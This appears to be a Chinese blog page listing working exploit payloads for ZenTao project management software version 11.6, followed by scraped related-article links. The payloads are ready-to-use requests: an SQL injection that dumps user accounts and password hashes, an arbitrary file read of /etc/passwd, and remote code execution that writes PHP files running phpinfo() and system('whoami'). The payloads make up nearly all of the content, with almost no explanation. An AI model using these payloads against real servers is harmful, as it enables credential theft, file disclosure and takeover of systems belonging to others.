禅道CMS 11.6漏洞
一.SQL注入漏洞
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
二.任意文件读取漏洞
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd
三.远程代码执行漏洞
1)远程代码执行命令phpnifo();
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111
POST: fileContent=<?php phpinfo(); ?>
Payload2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1
POST: fileContent=<?php phpinfo(); ?>
2)远程代码执行命令system('whoami');
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222
POST: fileContent=<?php system('whoami'); ?>
Payload 2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2
POST: fileContent=<?php system('whoami'); ?>
禅道CMS 11.6漏洞相关推荐
- 禅道CMS文件上传漏洞(CNVD-C-2020-121325)
1.影响版本 <=12.4.2 2.漏洞描述 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本 ...
- 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...
- 禅道项目管理系统RCE漏洞复现+利用
1.漏洞概述 禅道研发项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理.任务管理.bug管理.缺陷管理.用例管理.计划发布等功能,实现了软件的完整生命周期管理.2023年1月6日, ...
- 禅道linux一键安装漏洞,禅道漏洞第二弹后台读写任意文件/getshell
漏洞1: 任意文件写入漏洞 自评风险:严重 问题出在这里 这里新建方法的时候,其实会写到限定目录的,限定后是无法访问的所以这里,即使成功写也无法利用.不过,我们能跳出它的限制 老规矩,看poc POS ...
- (20)文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试
目录 理解文件上传漏洞: 文件上传漏洞: 文件上传漏洞: WebShell: 一句话木马: 产生上传漏洞原因: 原因: 常见的问题: 危害: 触发点,并判断是否存在文件上传漏洞: 触发点: 查找方法: ...
- 禅道 11.6版本 后台漏洞 复现和审计
文章目录 查看版本漏洞 sql注入 任意文件读取 rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致 ...
- 禅道项目管理_禅道 11.6.1 版本发布,完善细节,修复 Bug
禅道项目管理软件集产品管理.项目管理.质量管理.文档管理.组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程.禅道官网:www.zentao.net. 大家好,禅道 ...
- 禅道 11.4.1 版本发布,主要优化细节
禅道项目管理软件集产品管理.项目管理.质量管理.文档管理.组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程.禅道官网:www.zentao.net. 大家好,禅道 ...
- 禅道11.0windows本机安装
为了验证禅道的某个功能,需要用到生产上的数据,又不能在生产上进行.只能在本地搭建一套禅道,还原生产的数据到本地. 1.下载禅道 生产上用的是禅道11.0,数据库是11.0版本的数据库,为了更好兼容,下 ...
最新文章
- Mysql学习总结(4)——MySql基础知识、存储引擎与常用数据类型
- (五) 定点迭代法求根
- ORACLE 10046 Trace
- 阿里专家分享:企业级大数据轻量云实践
- Enterprise search result view column显示technical name
- Magento:在head.phtml中获取产品属性 echo a product attribute in magento head.phtml
- IDEA Docker 插件安装
- 学习精华——成长篇(三)
- Javascript-逻辑运算符()
- Javascript jquery css 写的简单进度条控件
- Uncaught SyntaxError: Unexpected token export
- USACO_Prime Cryptarithm
- Java在W10_java——基础 在w10环境下如何配置java环境
- 易改衣完成 5000 万 A 轮融资,唯品会战略投资
- 10的28次方C语言,c语言编程测定28的28次方有多少位
- U盘做成Mac启动盘之后怎么恢复成原来的U盘(U盘变成efi怎么恢复)
- Linux 创建无线热点
- 服务器直接ip登录显示令牌错误,SSL 配置动态令牌认证,令牌同步失败提示获取认证服务器配置失败或本地IP与认证服务器IP地址不匹配...
- [LuoGu] P3957 跳房子
- 戴蒙德对新冠疫情等的分析与看法笔记